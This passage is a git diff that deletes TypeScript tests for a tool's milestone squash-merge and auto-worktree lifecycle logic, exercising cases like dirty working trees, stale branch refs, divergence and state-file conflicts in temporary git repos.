-    // ─── Test 3: Nothing to commit — preserves branch (#1738) ──────────
-    console.log("\n=== nothing to commit — safe when no code changes (#1738, #1792) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M030");
-
-      // Don't add any slices/changes — milestone branch is identical to main
-      const roadmap = makeRoadmap("M030", "Empty milestone", []);
-
-      // Should NOT throw — milestone branch is identical to main, nothing to lose.
-      // The anchor check (#1792) verifies no code files differ and passes through.
-      let threw = false;
-      let errorMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M030", roadmap);
-      } catch (err: unknown) {
-        threw = true;
-        errorMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(!threw, `safe empty milestone should not throw (got: ${errorMsg})`);
-
-      // Main log unchanged (only init commit)
-      const mainLog = run("git log --oneline main", repo);
-      assertEq(mainLog.split("\n").length, 1, "main still has only init commit");
-    }
-
-    // ─── Test 4: Auto-push — verify push mechanics work ──────────────
-    // Note: loadEffectiveGSDPreferences uses a module-level const for project
-    // prefs path (process.cwd() at import time), so temp repo prefs aren't
-    // discoverable. We verify the push mechanics work by testing that
-    // mergeMilestoneToMain successfully completes with a remote configured,
-    // then manually push to verify the remote is set up correctly.
-    console.log("\n=== auto-push with bare remote ===");
-    {
-      const repo = freshRepo();
-
-      // Set up bare remote
-      const bareDir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-bare-")));
-      tempDirs.push(bareDir);
-      run("git init --bare", bareDir);
-      run(`git remote add origin ${bareDir}`, repo);
-      run("git push -u origin main", repo);
-
-      const wtPath = createAutoWorktree(repo, "M040");
-
-      addSliceToMilestone(repo, wtPath, "M040", "S01", "Push test", [
-        { file: "pushed.ts", content: "export const pushed = true;\n", message: "add pushed file" },
-      ]);
-
-      const roadmap = makeRoadmap("M040", "Push verification", [
-        { id: "S01", title: "Push test" },
-      ]);
-
-      const result = mergeMilestoneToMain(repo, "M040", roadmap);
-
-      // Verify merge succeeded (commit on main)
-      const mainLog = run("git log --oneline main", repo);
-      assertTrue(mainLog.includes("feat(M040)"), "milestone commit on main");
-
-      // Manually push to verify remote works
-      run("git push origin main", repo);
-      const remoteLog = run("git log --oneline main", bareDir);
-      assertTrue(remoteLog.includes("feat(M040)"), "milestone commit reachable on remote after manual push");
-
-      // Temp-repo prefs may or may not be discoverable depending on process cwd and
-      // current preference-loading behavior. The important contract is that remote
-      // push mechanics work and the returned value reflects what happened.
-      assertTrue(typeof result.pushed === "boolean", "pushed flag remains boolean");
-    }
-
-    // ─── Test 5: Auto-resolve .gsd/ state file conflicts (#530) ───────
-    console.log("\n=== auto-resolve .gsd/ state file conflicts ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M050");
-
-      // Add a slice with real work
-      addSliceToMilestone(repo, wtPath, "M050", "S01", "Conflict test", [
-        { file: "feature.ts", content: "export const feature = true;\n", message: "add feature" },
-      ]);
-
-      // Modify .gsd/STATE.md on the milestone branch (simulates auto-mode state updates)
-      writeFileSync(join(wtPath, ".gsd", "STATE.md"), "# State\n\n## Updated on milestone branch\n");
-      run("git add .", wtPath);
-      run('git commit -m "chore: update state on milestone branch"', wtPath);
-
-      // Now modify .gsd/STATE.md on main too (simulates divergence)
-      run("git checkout main", repo);
-      writeFileSync(join(repo, ".gsd", "STATE.md"), "# State\n\n## Updated on main\n");
-      run("git add .", repo);
-      run('git commit -m "chore: update state on main"', repo);
-
-      // Go back to worktree for the merge
-      process.chdir(wtPath);
-
-      const roadmap = makeRoadmap("M050", "Conflict resolution", [
-        { id: "S01", title: "Conflict test" },
-      ]);
-
-      // Merge should succeed despite .gsd/STATE.md conflict — auto-resolved
-      let threw = false;
-      try {
-        const result = mergeMilestoneToMain(repo, "M050", roadmap);
-        assertTrue(result.commitMessage.includes("feat(M050)"), "merge commit created despite .gsd conflict");
-      } catch (err) {
-        threw = true;
-      }
-      assertTrue(!threw, "auto-resolves .gsd/ state file conflicts without throwing");
-
-      // Feature file should be on main
-      assertTrue(existsSync(join(repo, "feature.ts")), "feature.ts merged to main");
-    }
-
-    // ─── Test 6: Skip checkout when main already current (#757) ───────
-    console.log("\n=== skip checkout when main already current (#757) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M060");
-
-      addSliceToMilestone(repo, wtPath, "M060", "S01", "Skip checkout test", [
-        { file: "skip-checkout.ts", content: "export const skip = true;\n", message: "add skip-checkout" },
-      ]);
-
-      const roadmap = makeRoadmap("M060", "Skip checkout verification", [
-        { id: "S01", title: "Skip checkout test" },
-      ]);
-
-      // Verify main is already checked out at repo root (worktree default)
-      const branchAtRoot = run("git rev-parse --abbrev-ref HEAD", repo);
-      assertEq(branchAtRoot, "main", "main is already checked out at project root");
-
-      // mergeMilestoneToMain should succeed without attempting to checkout main
-      // (which would fail with "already used by worktree" error)
-      let threw = false;
-      try {
-        const result = mergeMilestoneToMain(repo, "M060", roadmap);
-        assertTrue(result.commitMessage.includes("feat(M060)"), "merge commit created");
-      } catch (err) {
-        threw = true;
-        console.error("Unexpected error:", err);
-      }
-      assertTrue(!threw, "does not fail when main is already checked out at project root");
-
-      // Verify the merge actually happened
-      assertTrue(existsSync(join(repo, "skip-checkout.ts")), "skip-checkout.ts merged to main");
-    }
-
-    // ─── Test 7: Repo using `master` as default branch (#1668) ────────
-    console.log("\n=== master-branch repo — no META.json, no prefs (#1668) ===");
-    {
-      const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-master-test-")));
-      tempDirs.push(dir);
-      run("git init -b master", dir);
-      run("git config user.email test@test.com", dir);
-      run("git config user.name Test", dir);
-      writeFileSync(join(dir, "README.md"), "# master-branch repo\n");
-      mkdirSync(join(dir, ".gsd"), { recursive: true });
-      writeFileSync(join(dir, ".gsd", "STATE.md"), "# State\n");
-      run("git add .", dir);
-      run("git commit -m init", dir);
-      const defaultBranch = run("git rev-parse --abbrev-ref HEAD", dir);
-      assertEq(defaultBranch, "master", "repo is on master branch");
-
-      const wtPath = createAutoWorktree(dir, "M070");
-      addSliceToMilestone(dir, wtPath, "M070", "S01", "Master branch test", [
-        { file: "master-feature.ts", content: "export const masterFeature = true;\n", message: "add master feature" },
-      ]);
-
-      const metaFile = join(dir, ".gsd", "milestones", "M070", "M070-META.json");
-      assertTrue(!existsSync(metaFile), "no META.json — integration branch not captured");
-
-      const roadmap = makeRoadmap("M070", "Master branch milestone", [
-        { id: "S01", title: "Master branch test" },
-      ]);
-
-      let threw = false;
-      let errMsg = "";
-      try {
-        const result = mergeMilestoneToMain(dir, "M070", roadmap);
-        assertTrue(result.commitMessage.includes("feat(M070)"), "merge commit created on master");
-      } catch (err) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(!threw, `should not throw on master-branch repo (got: ${errMsg})`);
-
-      const finalBranch = run("git rev-parse --abbrev-ref HEAD", dir);
-      assertEq(finalBranch, "master", "repo is still on master after merge");
-      assertTrue(existsSync(join(dir, "master-feature.ts")), "feature merged to master");
-      const branches = run("git branch", dir);
-      assertTrue(!branches.includes("milestone/M070"), "milestone branch deleted after merge");
-    }
-
-    // ─── Test 8: #1738 Bug 1 — dirty working tree detected by nativeMergeSquash ──
-    console.log("\n=== #1738 bug 1: nativeMergeSquash detects dirty working tree ===");
-    {
-      const { nativeMergeSquash } = await import("../native-git-bridge.ts");
-      const repo = freshRepo();
-
-      run("git checkout -b milestone/M070", repo);
-      writeFileSync(join(repo, "feature.ts"), "export const feature = true;\n");
-      run("git add .", repo);
-      run('git commit -m "add feature"', repo);
-      run("git checkout main", repo);
-
-      writeFileSync(join(repo, "feature.ts"), "// local dirty version\n");
-
-      const result = nativeMergeSquash(repo, "milestone/M070");
-      assertEq(result.success, false, "merge reports failure on dirty working tree");
-      assertTrue(
-        result.conflicts.includes("__dirty_working_tree__"),
-        "conflicts include __dirty_working_tree__ sentinel",
-      );
-
-      run("git checkout -- . 2>/dev/null || true", repo);
-      run("rm -f feature.ts", repo);
-    }
-
-    // ─── Test 9: #1738 Bug 2 — branch preserved on empty squash commit ──
-    console.log("\n=== #1738 bug 2: branch preserved when squash commit empty ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M080");
-
-      // Make no changes — squash will produce nothing to commit
-      const roadmap = makeRoadmap("M080", "Empty milestone", []);
-
-      // With the #1792 anchor check, empty milestones with no code changes
-      // are safe to proceed — no data to lose.
-      let threw = false;
-      let errMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M080", roadmap);
-      } catch (err: unknown) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(!threw, `empty milestone with no code changes should not throw (got: ${errMsg})`);
-    }
-
-    // ─── Test 10: #1738 Bug 3 — clearProjectRootStateFiles cleans synced dirs ──
-    console.log("\n=== #1738 bug 3: synced .gsd/ dirs cleaned before merge ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M090");
-
-      addSliceToMilestone(repo, wtPath, "M090", "S01", "Sync test", [
-        { file: "sync-test.ts", content: "export const sync = true;\n", message: "add sync-test" },
-      ]);
-
-      // Simulate syncStateToProjectRoot: create untracked .gsd/ milestone files
-      const msDir = join(repo, ".gsd", "milestones", "M090", "slices", "S01");
-      mkdirSync(msDir, { recursive: true });
-      writeFileSync(join(msDir, "S01-PLAN.md"), "# synced plan\n");
-      writeFileSync(
-        join(repo, ".gsd", "milestones", "M090", "M090-ROADMAP.md"),
-        "# synced roadmap\n",
-      );
-
-      const runtimeDir = join(repo, ".gsd", "runtime", "units");
-      mkdirSync(runtimeDir, { recursive: true });
-      writeFileSync(join(runtimeDir, "unit-001.json"), '{"stale": true}');
-
-      const roadmap = makeRoadmap("M090", "Sync cleanup test", [
-        { id: "S01", title: "Sync test" },
-      ]);
-
-      let threw = false;
-      try {
-        const result = mergeMilestoneToMain(repo, "M090", roadmap);
-        assertTrue(
-          result.commitMessage.includes("feat(M090)"),
-          "#1738 merge succeeds after cleaning synced dirs",
-        );
-      } catch (err: unknown) {
-        threw = true;
-        console.error("#1738 bug 3 regression:", err);
-      }
-      assertTrue(!threw, "#1738 merge does not fail on synced .gsd/ files");
-      assertTrue(existsSync(join(repo, "sync-test.ts")), "sync-test.ts on main after merge");
-    }
-
-    // ─── Test 11: #1738 Bug 1+2 — dirty tree merge preserves branch end-to-end ──
-    console.log("\n=== #1738 e2e: dirty tree rejection preserves branch ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M100");
-
-      addSliceToMilestone(repo, wtPath, "M100", "S01", "E2E test", [
-        { file: "e2e.ts", content: "export const e2e = true;\n", message: "add e2e" },
-      ]);
-
-      writeFileSync(join(repo, "e2e.ts"), "// conflicting local file\n");
-
-      const roadmap = makeRoadmap("M100", "E2E dirty tree", [
-        { id: "S01", title: "E2E test" },
-      ]);
-
-      let threw = false;
-      let errorMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M100", roadmap);
-      } catch (err: unknown) {
-        threw = true;
-        errorMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(threw, "#1738 e2e: throws on dirty working tree");
-      assertTrue(
-        errorMsg.includes("dirty") || errorMsg.includes("untracked") || errorMsg.includes("overwritten"),
-        "#1738 e2e: error identifies dirty tree cause",
-      );
-
-      const branches = run("git branch", repo);
-      assertTrue(
-        branches.includes("milestone/M100"),
-        "#1738 e2e: milestone branch preserved on dirty tree rejection",
-      );
-    }
-
-    // ─── Test 12: Throw on unanchored code changes after empty commit (#1792) ─
-    console.log("\n=== throw on unanchored code changes after empty commit (#1792) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M120");
-
-      addSliceToMilestone(repo, wtPath, "M120", "S01", "Critical feature", [
-        { file: "critical.ts", content: "export const critical = true;\n", message: "add critical feature" },
-      ]);
-
-      // Simulate: merge then revert — git considers branch "already merged"
-      // but code is NOT on main (reverted).
-      run(`git merge milestone/M120 --no-ff -m "merge M120"`, repo);
-      run("git revert HEAD --no-edit -m 1", repo);
-
-      const roadmap = makeRoadmap("M120", "Critical milestone", [
-        { id: "S01", title: "Critical feature" },
-      ]);
-
-      let threw = false;
-      let errMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M120", roadmap);
-      } catch (err) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(threw, "throws when milestone has unanchored code changes (#1792)");
-      assertTrue(
-        errMsg.includes("code file(s) not on"),
-        "error message mentions unanchored code files (#1792)",
-      );
-
-      const branches = run("git branch", repo);
-      assertTrue(
-        branches.includes("milestone/M120"),
-        "milestone branch preserved when code is unanchored (#1792)",
-      );
-    }
-
-    // ─── Test 13: Safe teardown when nothing-to-commit and work already on main (#1792) ─
-    console.log("\n=== safe teardown — nothing to commit, work already on main (#1792) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M130");
-
-      addSliceToMilestone(repo, wtPath, "M130", "S01", "Already landed", [
-        { file: "landed.ts", content: "export const landed = true;\n", message: "add landed feature" },
-      ]);
-
-      run("git merge --squash milestone/M130", repo);
-      run('git commit -m "pre-land milestone work"', repo);
-
-      const roadmap = makeRoadmap("M130", "Pre-landed milestone", [
-        { id: "S01", title: "Already landed" },
-      ]);
-
-      let threw = false;
-      let errMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M130", roadmap);
-      } catch (err) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(!threw, `safe nothing-to-commit should not throw (got: ${errMsg})`);
-      assertTrue(existsSync(join(repo, "landed.ts")), "landed.ts present on main");
-    }
-
-    // ─── Test 14: Stale branch ref — worktree HEAD ahead of branch (#1846) ─
-    console.log("\n=== stale branch ref — fast-forward before squash merge (#1846) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M140");
-
-      // Add a first slice normally — this advances both the branch ref and HEAD
-      addSliceToMilestone(repo, wtPath, "M140", "S01", "Initial work", [
-        { file: "initial.ts", content: "export const initial = true;\n", message: "add initial" },
-      ]);
-
-      // Now simulate the bug: detach HEAD in the worktree, then make commits
-      // that advance HEAD but leave the milestone/M140 branch ref behind.
-      const branchRefBefore = run("git rev-parse milestone/M140", wtPath);
-      run("git checkout --detach HEAD", wtPath);
-
-      // Add multiple commits on the detached HEAD (simulates agent work)
-      writeFileSync(join(wtPath, "feature-a.ts"), "export const featureA = true;\n");
-      run("git add .", wtPath);
-      run('git commit -m "add feature-a"', wtPath);
-
-      writeFileSync(join(wtPath, "feature-b.ts"), "export const featureB = true;\n");
-      run("git add .", wtPath);
-      run('git commit -m "add feature-b"', wtPath);
-
-      writeFileSync(join(wtPath, "feature-c.ts"), "export const featureC = true;\n");
-      run("git add .", wtPath);
-      run('git commit -m "add feature-c"', wtPath);
-
-      // Verify: branch ref is stale, HEAD is ahead
-      const branchRefAfter = run("git rev-parse milestone/M140", wtPath);
-      const worktreeHead = run("git rev-parse HEAD", wtPath);
-      assertEq(branchRefBefore, branchRefAfter, "branch ref unchanged (stale)");
-      assertTrue(worktreeHead !== branchRefAfter, "worktree HEAD ahead of branch ref");
-
-      const roadmap = makeRoadmap("M140", "Stale ref milestone", [
-        { id: "S01", title: "Initial work" },
-      ]);
-
-      // The fix should fast-forward the branch ref to worktree HEAD before
-      // squash-merging, so ALL commits are captured.
-      let threw = false;
-      let errMsg = "";
-      try {
-        const result = mergeMilestoneToMain(repo, "M140", roadmap);
-        assertTrue(result.commitMessage.includes("feat(M140)"), "merge commit created");
-      } catch (err) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(!threw, `should not throw with stale branch ref (got: ${errMsg})`);
-
-      // ALL files from detached HEAD commits must be on main — not just
-      // the ones from the stale branch ref
-      assertTrue(existsSync(join(repo, "initial.ts")), "initial.ts on main");
-      assertTrue(existsSync(join(repo, "feature-a.ts")), "feature-a.ts on main (#1846)");
-      assertTrue(existsSync(join(repo, "feature-b.ts")), "feature-b.ts on main (#1846)");
-      assertTrue(existsSync(join(repo, "feature-c.ts")), "feature-c.ts on main (#1846)");
-    }
-
-    // ─── Test 15: Diverged worktree HEAD — throws instead of losing data (#1846) ─
-    console.log("\n=== diverged worktree HEAD — throws on divergence (#1846) ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M150");
-
-      addSliceToMilestone(repo, wtPath, "M150", "S01", "Base work", [
-        { file: "base.ts", content: "export const base = true;\n", message: "add base" },
-      ]);
-
-      run("git checkout --detach HEAD", wtPath);
-      writeFileSync(join(wtPath, "detached-work.ts"), "export const detached = true;\n");
-      run("git add .", wtPath);
-      run('git commit -m "detached work"', wtPath);
-
-      run("git checkout milestone/M150", repo);
-      writeFileSync(join(repo, "diverged-work.ts"), "export const diverged = true;\n");
-      run("git add .", repo);
-      run('git commit -m "diverged work on branch"', repo);
-      run("git checkout main", repo);
-
-      process.chdir(wtPath);
-
-      const roadmap = makeRoadmap("M150", "Diverged milestone", [
-        { id: "S01", title: "Base work" },
-      ]);
-
-      let threw = false;
-      let errMsg = "";
-      try {
-        mergeMilestoneToMain(repo, "M150", roadmap);
-      } catch (err) {
-        threw = true;
-        errMsg = err instanceof Error ? err.message : String(err);
-      }
-      assertTrue(threw, "throws when worktree HEAD diverged from branch ref (#1846)");
-      assertTrue(errMsg.includes("diverged"), "error message mentions divergence (#1846)");
-
-      const branches = run("git branch", repo);
-      assertTrue(branches.includes("milestone/M150"), "milestone branch preserved on divergence (#1846)");
-    }
-
-    // ─── Test 16: #1853 Bug 1 — SQUASH_MSG cleaned up after squash-merge ──
-    console.log("\n=== #1853 bug 1: SQUASH_MSG cleaned up after successful squash-merge ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M160");
-
-      addSliceToMilestone(repo, wtPath, "M160", "S01", "SQUASH_MSG cleanup test", [
-        { file: "squash-cleanup.ts", content: "export const cleanup = true;\n", message: "add squash-cleanup" },
-      ]);
-
-      const roadmap = makeRoadmap("M160", "SQUASH_MSG cleanup", [
-        { id: "S01", title: "SQUASH_MSG cleanup test" },
-      ]);
-
-      const squashMsgPath = join(repo, ".git", "SQUASH_MSG");
-      writeFileSync(squashMsgPath, "leftover squash message\n");
-      assertTrue(existsSync(squashMsgPath), "SQUASH_MSG planted before merge");
-
-      const result = mergeMilestoneToMain(repo, "M160", roadmap);
-      assertTrue(result.commitMessage.includes("feat(M160)"), "merge commit created");
-
-      assertTrue(
-        !existsSync(squashMsgPath),
-        "#1853: SQUASH_MSG must not persist after successful squash-merge",
-      );
-    }
-
-    // ─── Test 17: #1853 Bug 2 — uncommitted worktree code survives teardown ──
-    console.log("\n=== #1853 bug 2: uncommitted worktree changes committed before teardown ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M170");
-
-      addSliceToMilestone(repo, wtPath, "M170", "S01", "Teardown safety test", [
-        { file: "safe-file.ts", content: "export const safe = true;\n", message: "add safe file" },
-      ]);
-
-      writeFileSync(join(wtPath, "uncommitted-agent-code.ts"), "export const lost = true;\n");
-
-      const roadmap = makeRoadmap("M170", "Teardown safety", [
-        { id: "S01", title: "Teardown safety test" },
-      ]);
-
-      const result = mergeMilestoneToMain(repo, "M170", roadmap);
-      assertTrue(result.commitMessage.includes("feat(M170)"), "merge commit created");
-
-      assertTrue(
-        existsSync(join(repo, "uncommitted-agent-code.ts")),
-        "#1853: uncommitted worktree code must survive teardown",
-      );
-    }
-
-    // ─── Test 18: #1906 — codeFilesChanged false when only .gsd/ metadata merged ──
-    console.log("\n=== #1906: codeFilesChanged=false when only .gsd/ metadata merged ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M180");
-
-      // Only add .gsd/ metadata files — no actual code
-      mkdirSync(join(wtPath, ".gsd", "milestones", "M180"), { recursive: true });
-      writeFileSync(
-        join(wtPath, ".gsd", "milestones", "M180", "SUMMARY.md"),
-        "# M180 Summary\n\nThis milestone was planned but not implemented.\n",
-      );
-      run("git add .", wtPath);
-      run('git commit -m "chore: add milestone summary"', wtPath);
-
-      const roadmap = makeRoadmap("M180", "Metadata-only milestone", []);
-
-      const result = mergeMilestoneToMain(repo, "M180", roadmap);
-      assertEq(
-        result.codeFilesChanged,
-        false,
-        "#1906: codeFilesChanged must be false when only .gsd/ files were merged",
-      );
-    }
-
-    // ─── Test 19: #1906 — codeFilesChanged true when real code is merged ──
-    console.log("\n=== #1906: codeFilesChanged=true when real code is merged ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M190");
-
-      addSliceToMilestone(repo, wtPath, "M190", "S01", "Real code", [
-        { file: "real-code.ts", content: "export const real = true;\n", message: "add real code" },
-      ]);
-
-      const roadmap = makeRoadmap("M190", "Code milestone", [
-        { id: "S01", title: "Real code" },
-      ]);
-
-      const result = mergeMilestoneToMain(repo, "M190", roadmap);
-      assertEq(
-        result.codeFilesChanged,
-        true,
-        "#1906: codeFilesChanged must be true when real code files were merged",
-      );
-      assertTrue(existsSync(join(repo, "real-code.ts")), "real-code.ts merged to main");
-    }
-
-  } finally {
-    process.chdir(savedCwd);
-    for (const d of tempDirs) {
-      if (existsSync(d)) rmSync(d, { recursive: true, force: true });
-    }
-  }
-
-  report();
-}
-
-main();
diff --git a/src/resources/extensions/gsd/tests/auto-worktree.test.ts b/src/resources/extensions/gsd/tests/auto-worktree.test.ts
deleted file mode 100644
index 1966c00bf..000000000
--- a/src/resources/extensions/gsd/tests/auto-worktree.test.ts
+++ /dev/null
@@ -1,267 +0,0 @@
-/**
- * auto-worktree.test.ts — Tests for auto-worktree lifecycle.
- *
- * Covers: create → detect → teardown, re-entry, path helpers.
- * Runs in a real temp git repo.
- */
-
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, realpathSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import { execSync } from "node:child_process";
-
-import {
-  createAutoWorktree,
-  teardownAutoWorktree,
-  isInAutoWorktree,
-  getAutoWorktreePath,
-  enterAutoWorktree,
-  getAutoWorktreeOriginalBase,
-  getActiveAutoWorktreeContext,
-} from "../auto-worktree.ts";
-
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
-function run(command: string, cwd: string): string {
-  return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
-}
-
-function createTempRepo(): string {
-  const dir = realpathSync(mkdtempSync(join(tmpdir(), "auto-wt-test-")));
-  run("git init", dir);
-  run("git config user.email test@test.com", dir);
-  run("git config user.name Test", dir);
-  // Create initial commit on main
-  writeFileSync(join(dir, "README.md"), "# test\n");
-  run("git add .", dir);
-  run("git commit -m init", dir);
-  // Ensure branch is called main
-  run("git branch -M main", dir);
-  return dir;
-}
-
-async function main(): Promise<void> {
-  const savedCwd = process.cwd();
-  let tempDir = "";
-
-  try {
-    tempDir = createTempRepo();
-
-    // Create .gsd/milestones/M003 with a dummy file (simulates planning artifacts)
-    const msDir = join(tempDir, ".gsd", "milestones", "M003");
-    mkdirSync(msDir, { recursive: true });
-    writeFileSync(join(msDir, "CONTEXT.md"), "# M003 Context\n");
-    run("git add .", tempDir);
-    run("git commit -m \"add milestone\"", tempDir);
-
-    console.log("\n=== auto-worktree lifecycle ===");
-
-    // ─── createAutoWorktree ──────────────────────────────────────────
-    const wtPath = createAutoWorktree(tempDir, "M003");
-
-    assertTrue(existsSync(wtPath), "worktree directory exists after create");
-    assertEq(process.cwd(), wtPath, "process.cwd() is worktree path after create");
-
-    const branch = run("git branch --show-current", wtPath);
-    assertEq(branch, "milestone/M003", "git branch is milestone/M003");
-
-    assertTrue(
-      existsSync(join(wtPath, ".gsd", "milestones", "M003", "CONTEXT.md")),
-      "planning files inherited in worktree",
-    );
-
-    // ─── isInAutoWorktree ────────────────────────────────────────────
-    assertTrue(isInAutoWorktree(tempDir), "isInAutoWorktree returns true when inside");
-
-    // ─── getAutoWorktreeOriginalBase ─────────────────────────────────
-    assertEq(getAutoWorktreeOriginalBase(), tempDir, "originalBase returns temp dir");
-    assertEq(
-      getActiveAutoWorktreeContext(),
-      {
-        originalBase: tempDir,
-        worktreeName: "M003",
-        branch: "milestone/M003",
-      },
-      "active auto-worktree context reflects the worktree cwd",
-    );
-
-    // ─── getAutoWorktreePath ─────────────────────────────────────────
-    assertEq(getAutoWorktreePath(tempDir, "M003"), wtPath, "getAutoWorktreePath returns correct path");
-    assertEq(getAutoWorktreePath(tempDir, "M999"), null, "getAutoWorktreePath returns null for nonexistent");
-
-    // ─── teardownAutoWorktree ────────────────────────────────────────
-    teardownAutoWorktree(tempDir, "M003");
-
-    assertEq(process.cwd(), tempDir, "process.cwd() back to original after teardown");
-    assertTrue(!existsSync(wtPath), "worktree directory removed after teardown");
-    assertTrue(!isInAutoWorktree(tempDir), "isInAutoWorktree returns false after teardown");
-    assertEq(getAutoWorktreeOriginalBase(), null, "originalBase is null after teardown");
-    assertEq(getActiveAutoWorktreeContext(), null, "active auto-worktree context clears after teardown");
-
-    // ─── Re-entry: create again, exit without teardown, re-enter ─────
-    console.log("\n=== re-entry ===");
-
-    const wtPath2 = createAutoWorktree(tempDir, "M003");
-    assertTrue(existsSync(wtPath2), "worktree re-created");
-
-    // Manually chdir out (simulates pause/crash)
-    process.chdir(tempDir);
-
-    // enterAutoWorktree should re-enter
-    const entered = enterAutoWorktree(tempDir, "M003");
-    assertEq(process.cwd(), entered, "re-entered worktree via enterAutoWorktree");
-    assertEq(getAutoWorktreeOriginalBase(), tempDir, "originalBase restored on re-entry");
-    assertTrue(isInAutoWorktree(tempDir), "isInAutoWorktree true after re-entry");
-    assertEq(
-      getActiveAutoWorktreeContext(),
-      {
-        originalBase: tempDir,
-        worktreeName: "M003",
-        branch: "milestone/M003",
-      },
-      "active auto-worktree context is restored on re-entry",
-    );
-
-    // Cleanup
-    teardownAutoWorktree(tempDir, "M003");
-
-    // ─── Coexistence with manual worktree ─────────────────────────────
-    console.log("\n=== coexistence ===");
-
-    // Import createWorktree directly for manual worktree
-    const { createWorktree } = await import("../worktree-manager.ts");
-
-    // Create manual worktree (uses worktree/<name> branch)
-    const manualWt = createWorktree(tempDir, "feature-x");
-    assertTrue(existsSync(manualWt.path), "manual worktree exists");
-    assertEq(manualWt.branch, "worktree/feature-x", "manual worktree uses worktree/ prefix");
-
-    // Create auto-worktree alongside
-    const autoWtPath = createAutoWorktree(tempDir, "M003");
-    assertTrue(existsSync(autoWtPath), "auto-worktree coexists with manual");
-    assertTrue(existsSync(manualWt.path), "manual worktree still exists");
-
-    // Cleanup both
-    teardownAutoWorktree(tempDir, "M003");
-    const { removeWorktree } = await import("../worktree-manager.ts");
-    removeWorktree(tempDir, "feature-x");
-
-    // ─── Failure: split-brain prevention ──────────────────────────────
-    console.log("\n=== split-brain prevention ===");
-    // After teardown, originalBase should be null
-    assertEq(getAutoWorktreeOriginalBase(), null, "no split-brain: originalBase cleared");
-
-    // ─── #1526: getMainBranch returns milestone branch in auto-worktree ──
-    console.log("\n=== #1526: getMainBranch() returns milestone/<MID> in auto-worktree ===");
-    {
-      const { GitServiceImpl } = await import("../git-service.ts");
-
-      // Create worktree
-      const wtPath = createAutoWorktree(tempDir, "M005");
-      // Don't set main_branch pref so getMainBranch falls through to worktree detection
-      const gitService = new GitServiceImpl(wtPath);
-      gitService.setMilestoneId("M005");
-
-      // Verify getMainBranch returns the milestone branch
-      const mainBranch = gitService.getMainBranch();
-      assertEq(mainBranch, "milestone/M005", "getMainBranch returns milestone/<MID> in auto-worktree");
-
-      // Cleanup
-      teardownAutoWorktree(tempDir, "M005");
-    }
-
-    // ─── #1713: stale worktree directory recovery ─────────────────────
-    console.log("\n=== #1713: stale worktree directory without .git file ===");
-    {
-      // Simulate a crash leaving a stale directory with no .git file.
-      // createAutoWorktree should detect and remove the stale directory,
-      // then successfully create a fresh worktree.
-      const { worktreePath } = await import("../worktree-manager.ts");
-      const staleDir = worktreePath(tempDir, "M010");
-      mkdirSync(staleDir, { recursive: true });
-      // Write a dummy file to prove it's not an empty directory
-      writeFileSync(join(staleDir, "orphan.txt"), "stale leftover\n");
-      assertTrue(existsSync(staleDir), "stale directory exists before recovery");
-      assertTrue(!existsSync(join(staleDir, ".git")), "stale directory has no .git file");
-
-      // createAutoWorktree should remove the stale dir and create a real worktree
-      const recoveredPath = createAutoWorktree(tempDir, "M010");
-      assertTrue(existsSync(recoveredPath), "worktree created after stale dir recovery");
-      assertTrue(existsSync(join(recoveredPath, ".git")), "recovered worktree has .git file");
-      assertTrue(!existsSync(join(recoveredPath, "orphan.txt")), "stale file removed by recovery");
-
-      teardownAutoWorktree(tempDir, "M010");
-    }
-
-    // ─── #778: reconcile plan checkboxes on re-attach ─────────────────
-    console.log("\n=== #778: reconcile plan checkboxes on re-attach ===");
-    {
-      // Simulate: T01 [x] was committed to milestone branch, T02 [x] was
-      // written to project root by syncStateToProjectRoot() but the
-      // auto-commit crashed before it fired. On restart the worktree is
-      // re-created from the milestone branch HEAD (T02 still [ ]).
-      // reconcilePlanCheckboxes should forward-apply T02 [x] from the root.
-
-      const planRelPath = join(".gsd", "milestones", "M004", "slices", "S01", "S01-PLAN.md");
-      const planDir = join(tempDir, ".gsd", "milestones", "M004", "slices", "S01");
-      const { mkdirSync: mkdir, writeFileSync: write, readFileSync: read } = await import("node:fs");
-
-      // Plan on integration branch (project root): T01 [x], T02 [x]
-      mkdir(planDir, { recursive: true });
-      write(
-        join(tempDir, planRelPath),
